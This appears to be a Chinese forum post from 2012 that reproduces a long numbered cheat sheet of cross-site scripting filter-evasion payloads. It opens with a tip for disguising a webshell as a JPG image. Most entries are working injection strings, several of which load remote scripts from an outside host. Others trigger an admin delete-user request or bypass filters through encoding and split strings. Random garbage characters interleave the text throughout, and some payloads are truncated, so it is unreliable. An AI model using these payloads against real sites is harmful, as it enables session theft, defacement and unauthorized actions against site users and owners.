跨站图片shell6 g' v+ g- m, _2 H4 \$ S' p
XSS跨站代码 <script>alert("")</script>
% W1 {4 p( Y' h& q
; z5 |0 D6 w9 a9 o将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
# ?7 {9 {, `6 g/ F# b' W: J3 V$ x6 x) k8 Q! G: t4 t; D
$ B) v. g& Q7 h4 A7 ]* f
8 H# w4 U4 m6 u6 j7 F1)普通的XSS JavaScript注入
5 M7 H2 M3 O. m<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% G( c3 i# g$ V
1 ^8 u5 z* }" {" T8 ?8 p8 f" U8 _(2)IMG标签XSS使用JavaScript命令/ N9 h5 H# U6 j; i" ~! i* S
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, I2 B; \. E8 ?" |) o* Y# I, r9 x( ~) B, a1 G& A# X
(3)IMG标签无分号无引号
& R) ?. n7 R- M w: _4 J8 x<IMG SRC=javascript:alert(‘XSS’)>
N2 l% K! J" w" |1 f& _, [ P
$ S o7 {% b9 ~0 h% z(4)IMG标签大小写不敏感$ W* H2 r$ i2 s( E: S0 f
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ Y% {, s( n) c! e
- i4 s) \4 Z( N- h2 y(5)HTML编码(必须有分号)
' } ]3 j" K+ |( r' P& @8 X<IMG SRC=javascript:alert(“XSS”)>
4 w" y! c9 u7 s" D
5 j' W7 p0 w2 |+ h& s" d(6)修正缺陷IMG标签3 z' C- E7 R) {
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
. ~1 F9 f2 [) s0 N m
4 w- t& c0 W* f* o$ y(7)formCharCode标签(计算器); n7 X1 @, ]) E r! x
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>5 ~4 l% f+ E& Q8 _% |+ M8 h
8 y# Y. K3 }! v( [. @( I+ l2 T7 W
(8)UTF-8的Unicode编码(计算器)6 W" @8 V2 m# t, e
<IMG SRC=jav..省略..S')>
0 G% @8 z6 i6 N J: O6 ^& k0 P: Z6 T" H
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, D+ t! L: b* T n& X# O<IMG SRC=jav..省略..S')>
1 n* t% X- J( G" M
# U f: J, @0 T3 \(10)十六进制编码也是没有分号(计算器)2 S2 T6 c3 v* a6 N
<IMG SRC=java..省略..XSS')>- m0 v G1 P2 }+ W+ c
8 S* c3 q; V, C
(11)嵌入式标签,将Javascript分开
* C- d' a* `& N' ^7 ^<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 |) [: S+ v8 s! J B8 v
, a1 V% q2 H3 D1 M(12)嵌入式编码标签,将Javascript分开! `( b# @+ n% i; J( a$ K# S3 G* k, g' A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 L* R0 G/ m: Y/ l5 z k+ J1 y6 w4 p9 _. r
(13)嵌入式换行符
' h3 c4 Q$ [, y( L3 m<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ a. d; `: X% Q7 z8 `/ O& B0 R; i4 k3 m# ?2 E: t
(14)嵌入式回车$ F! S3 {7 G6 s
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 S; v0 y N; L* g& K# k- m
: F5 l: H, Z; P, G1 g' N2 u(15)嵌入式多行注入JavaScript,这是XSS极端的例子
+ a b s& L3 M+ T% Y8 p! l<IMG SRC=”javascript:alert(‘XSS‘)”>
9 Y1 X% u" g+ c( ?8 X2 f6 I2 w) ?
) o/ i: z) k5 ~7 t# u(16)解决限制字符(要求同页面)
5 O) e# `9 i6 j/ U- m2 D<script>z=’document.’</script>3 a* t4 {+ }0 f7 |- W# C/ N, R$ n
<script>z=z+’write(“‘</script>
4 ]5 E) L$ b) E y+ ^" ~<script>z=z+’<script’</script>7 P9 ~8 a& |, a
<script>z=z+’ src=ht’</script>
6 c4 N- T. C* M1 A9 }0 T<script>z=z+’tp://ww’</script>
" ], }# U" ^0 \- P0 c<script>z=z+’w.shell’</script>
2 Z+ J3 u$ N/ R; y: [<script>z=z+’.net/1.’</script>- ~2 j( k4 d& j2 t1 F
<script>z=z+’js></sc’</script>
- _3 d* c& [, L% P) X<script>z=z+’ript>”)’</script>) Q, P( S, P' ^4 S6 Q
<script>eval_r(z)</script>
q( |2 i2 b) b. g$ S4 l) j9 }" E: I" V( u3 @1 Y+ A
(17)空字符
: e" _/ R7 A" u$ Z1 @$ cperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 C0 E a( S" \7 q. T+ _
0 G1 G/ R5 ~) u: c: k1 n(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
/ Q) N5 t0 F( Q [2 l( v7 }5 Uperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out* Y" j. [$ ^1 U% m. \
; @: S( z* i; A0 E/ T9 L$ b
(19)Spaces和meta前的IMG标签2 d6 s( E# o6 J: F- L# \
<IMG SRC=” javascript:alert(‘XSS’);”>
/ m+ E; ^7 q3 n0 } n5 e: ~' i
. d" d3 R0 i; u) K(20)Non-alpha-non-digit XSS* n4 J) J9 c: h- k" V
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT># B! _' D% @) ?% e1 m/ Z
, c# K% C& \$ e/ o9 A J
(21)Non-alpha-non-digit XSS to 2
* P! R6 d# o; L e; }<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>0 k% m. f0 z( ?; k( V
: I5 N( C% G$ |(22)Non-alpha-non-digit XSS to 3
8 ]& S6 Z. d; T1 i& D1 |1 G: k<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& `6 J# W8 P4 a/ K+ V9 W. z& e
& m& N$ F5 ] z% E* k(23)双开括号
% _9 b; s5 Z/ l<<SCRIPT>alert(“XSS”);//<</SCRIPT>
( K& i- R# v/ N8 q! b" [% B) d
5 Y3 p. s( p8 k$ x, s4 I" ], `, F(24)无结束脚本标记(仅火狐等浏览器)+ j$ J$ C3 ?2 v& V
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
, h% Z9 G+ B& K& m9 ?, z7 y: R; A1 C) J @7 h
(25)无结束脚本标记25 C- g9 W3 U* x e2 k0 s u" z
<SCRIPT SRC=//3w.org/XSS/xss.js>
7 c) D4 i. `9 c
1 }- Z5 |" B( h& u! I2 J(26)半开的HTML/JavaScript XSS E0 Z9 K8 I% e# Y! e) E7 I
<IMG SRC=”javascript:alert(‘XSS’)”$ B- a& p& a' M0 Z' X
/ [$ A' a( O8 q: l$ w7 e8 W3 j(27)双开角括号
1 z) _+ Z3 r( J$ U' M4 _<iframe src=http://3w.org/XSS.html <
9 g& O; A- U- R) q- B3 R4 A+ n3 z; Y" S! S" R' V
(28)无单引号 双引号 分号* L+ \: w# W2 G! n0 D* Q
<SCRIPT>a=/XSS/
0 g7 l9 P" n3 o9 s# s# ialert(a.source)</SCRIPT>/ ?' ]' r) o* z
8 k0 ^1 {( H7 K" U0 C(29)换码过滤的JavaScript
( o' y& y9 z! |7 I! S) @( }- e\”;alert(‘XSS’);//
p5 n5 O8 T: k
% q/ q. N. r& m5 b(30)结束Title标签
6 ]; w. h( e: T0 B: a5 A! A! l7 X k</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>; _" P5 r1 I: h, b6 ~( g
" t# w0 x5 b l- V) q1 n(31)Input Image% L7 K4 ~" |% G" x
<INPUT SRC=”javascript:alert(‘XSS’);”>
9 J# w: x0 O3 M; w( _) l( @& i% o' o2 i+ N+ @- Y! H
(32)BODY Image
: s% g9 x* M1 Z2 |; o4 S<BODY BACKGROUND=”javascript:alert(‘XSS’)”>5 k4 H% k6 \. X5 ^9 V7 y& g" L
B0 Q/ W# d0 t: g B4 j
(33)BODY标签5 D% c) P# V( R9 L8 I: W
<BODY(‘XSS’)>
8 F1 w1 Q' N5 c% K9 W* ]* H' f- s9 q6 e" m1 A" o* ?
(34)IMG Dynsrc8 ~/ R, K, s: K, @1 M4 q% T1 N
<IMG DYNSRC=”javascript:alert(‘XSS’)”>. P& K" u) A) t2 Z- B5 ^! R+ I. G
0 T' l6 J0 U$ q M
(35)IMG Lowsrc
4 x% g7 Q8 V ]. j" [3 t2 f<IMG LOWSRC=”javascript:alert(‘XSS’)”>4 ?4 `% X/ {3 p7 ]- {/ A
5 m* G7 \% n Z# ?! p0 M. I(36)BGSOUND" ~# G% o% Z) }2 [+ B; R
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
3 W$ Y1 R6 v' B E
3 X1 w0 i5 E( p/ K(37)STYLE sheet
3 G/ K) {: @/ f, ]. R/ t% a<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 H, A: N" {. W3 p; l0 J b
2 X& Z9 K# F! W, M* k" g
(38)远程样式表
& j# \9 m& v) o$ ?<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>: O4 ^+ O- d U# D' _6 W
( M9 I/ G7 L/ {0 h8 q) K$ E; V: A
(39)List-style-image(列表式)7 {. J! Y8 E6 m# U% w" U
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
, A0 z# s3 W7 o' [5 B
5 W. p: |3 q- T8 ^. V3 R) f- U(40)IMG VBscript& {/ e9 @5 a4 ?# W' `
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS. e( b: m$ F# @, H; A
) [0 J2 L0 I7 n; L" x; J
(41)META链接url
8 E# }/ o7 O y9 K( ]. b( Y<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>* F; N1 X$ s0 q, S1 o" Y, i
( U) B: e1 q, {/ f( _3 v(42)Iframe5 _9 A4 p: {4 r; ~/ I
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>9 M# B3 I8 T4 }- d" k1 k H0 Q
(43)Frame& \/ Y/ P( r$ g8 p& x" X
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
. ~1 h: m+ d( f9 j
0 `6 }/ W: G+ }(44)Table1 `0 k5 O+ b* E# t9 \
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
: ^. w R. r {6 Z8 T- O- t; H! w) @- B, d4 r3 H4 |. j
(45)TD+ v% n. \/ S2 A. b2 d
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 k7 R4 `' H* W2 @2 P! n1 H6 K7 k$ r0 R, w* T6 V7 ]3 W' ?( Y
(46)DIV background-image
: _, k6 H/ p/ W3 \: ?- [& b- [+ u<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( i$ E- ^ Q3 j7 g7 Q) j
0 _1 e6 Q# a" l(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)* [& f, Z& c) Q1 @, o$ d/ T
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
& b5 Q0 [" D6 q& j; Z; b( J; [6 z% j v$ c
(48)DIV expression6 t7 U; j$ }) `" Q
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>4 {! m0 w1 o- U$ e
( r1 M' n" E* }$ a4 P, m8 _3 `. v(49)STYLE属性分拆表达: F4 t5 ?( g, u/ f6 p4 s9 Z
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
9 ~3 u6 A+ q3 u+ q K# {, R( G. ?- F; E
(50)匿名STYLE(组成:开角号和一个字母开头)
t/ [1 z& g$ @( y* {<XSS STYLE=”xss:expression_r(alert(‘XSS’))”># g# j9 f% w* J& r' N5 i% w4 I
& M5 X6 m& D: f) F
(51)STYLE background-image
- p0 v0 X6 J8 R# f' A ]<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>2 o, K/ y' t9 J; v6 R( O0 b. R
d! i2 h/ o8 t, f(52)IMG STYLE方式
( F; m5 Z. h7 ~; \5 hexppression(alert(“XSS”))’>
9 S; e# C( k+ y8 {+ B% k0 q# p7 e% Y, Y
(53)STYLE background
' `8 i; G4 Z R$ K( y<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>6 T4 ~- {5 J1 y' F/ F
- M5 l) o) \7 p$ m(54)BASE
- p2 ^) l: s, R) H. Z<BASE HREF=”javascript:alert(‘XSS’);//”>3 Y6 r2 V$ d3 @! J0 f# g- [
, t: ]$ y: j, `" l3 P! ]; e) O(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS ^, b; {8 l( K0 g8 m- m
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
! r! Z& ?# x w0 n1 J& @; B4 m* l' m' U8 t, |$ b
(56)在flash中使用ActionScrpt可以混进你XSS的代码+ V" e) ^ w9 p7 [% t
a=”get”;/ U7 P8 S9 y: F
b=”URL(\”";
6 R# R$ ^2 Z! kc=”javascript:”; d. J1 t: l, G4 v
d=”alert(‘XSS’);\”)”;
$ v5 S7 B5 N. z; V+ Leval_r(a+b+c+d);
1 f4 y! W+ k. G- E! U% T; q7 {: O$ ?2 I
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上' ~6 Y9 K4 \6 P% m9 j- j" ^
<HTML xmlns:xss>
' Y1 f( B- j$ {( j<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>8 r& x% I" C' A2 e
<xss:xss>XSS</xss:xss>
! e' ~: m m$ g1 V4 `</HTML>) d9 J* I0 S4 W' \6 \
- \; C& a) ~- ]. z7 }- D7 g(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
4 d) s" U* O: |<SCRIPT SRC=””></SCRIPT>0 q% c7 f+ `& m8 S
9 c! q `! j" Q& Q) M- Q- s
(59)IMG嵌入式命令,可执行任意命令9 y8 ^$ G2 |: u1 K5 }5 w
<IMG SRC=”http://www.XXX.com/a.php?a=b”>' `. Y5 ?: y, @% ~5 n; }2 p
8 D6 Y$ t8 {$ G3 \: ]$ }+ ]. W(60)IMG嵌入式命令(a.jpg在同服务器) [# Q$ B/ ?' f5 g. O1 }
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
* L7 ]; m- v6 h" j1 m' d! m# R. e7 x
(61)绕符号过滤
# j% y4 q6 ~* b t0 M<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>- e6 F0 H' V( v. `% c$ e* ~
# i$ B: v: i! j1 G; H, n
(62)! G3 O8 t5 ?' k- R: O4 `7 C
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 ~7 Y& U. ]" r/ m! ?2 T
( V6 S4 I a' V# @! \' Z+ S(63)
; Z' } H, U4 J. L# G' t7 @<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>1 d* `# H+ U0 E" Q" [/ t- J
! \3 l, G. j% y7 w/ B, M(64)& ~" J' Q% O3 z
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
% {1 d9 t) X) x7 h
: w; h0 c1 z! r0 W0 R7 w6 _(65)* O' v& M' k8 S* P! ?8 r! B1 F, o
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
/ g" L0 q( y* R/ }( z+ ?. l2 f! z {3 A' i& p
(66)' [& u" |7 a7 z3 g4 g/ _
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>1 {4 c' E+ M( n3 e7 C7 }
! n0 ~; }# C4 J) T9 d1 G
(67)* R7 T- z; Y* b8 I5 O/ V: R5 B& I
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
/ `% Q, B; h7 O8 ~; H, z& B
/ ~ k( m; g! y/ m1 R(68)URL绕行
; g4 J: h6 @+ P' `3 P! Z1 F<A HREF=”http://127.0.0.1/”>XSS</A>* c) ?9 z% w \6 {0 g
# n5 Y( O3 L3 D- v. W(69)URL编码9 D/ f. n% z! {" i, A' d6 o
<A HREF=”http://3w.org”>XSS</A>
1 C. I6 B# ~5 \6 i/ D/ w- ^1 q# ^% i; ?3 Z
(70)IP十进制
" S9 `% N9 b& F6 I' n+ @! J<A HREF=”http://3232235521″>XSS</A>
0 t6 a1 e# U* y& q' M( l; K# H# y# f) z. V+ D& s0 I
(71)IP十六进制
& N! E% t- q, M<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 B+ x0 E4 x2 a( F
& p( r1 L) w' `& \) G(72)IP八进制
: |, u* I2 n, V6 n& F) A( `* a<A HREF=”http://0300.0250.0000.0001″>XSS</A>
+ M4 u$ b5 E7 W
# z$ p# J% i6 A) r" a5 z(73)混合编码
. P6 g6 Y0 Q* o+ ^2 O: a# H<A HREF=”h
& y3 @; q9 X% b) @tt p://6 6.000146.0×7.147/”">XSS</A>
7 p0 L+ T* h7 l
% I4 d' g/ K- m7 V2 S) y(74)节省[http:]
6 e# B, Z. k# q; N& \& Z, J1 U) u1 Z7 b<A HREF=”//www.google.com/”>XSS</A>) T: x4 ?# a! c
& v0 v# A# e8 ^/ q ~9 y- n
(75)节省[www]
; D/ L1 o1 x' B! E4 |<A HREF=”http://google.com/”>XSS</A>
4 P( h' v$ M/ L! J" Y; q) y- U; s) @' ?' K+ P$ [0 y
(76)绝对点绝对DNS; R4 |1 K' P6 _
<A HREF=”http://www.google.com./”>XSS</A>! O; h8 C X6 ?1 r' B3 O
6 V+ D/ D4 ^- U! f
(77)javascript链接
; w; H7 P* ]& M# D<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>( R0 x: a# I. G
|
发表于 2012-9-13 17:04:56
收藏
支持
反对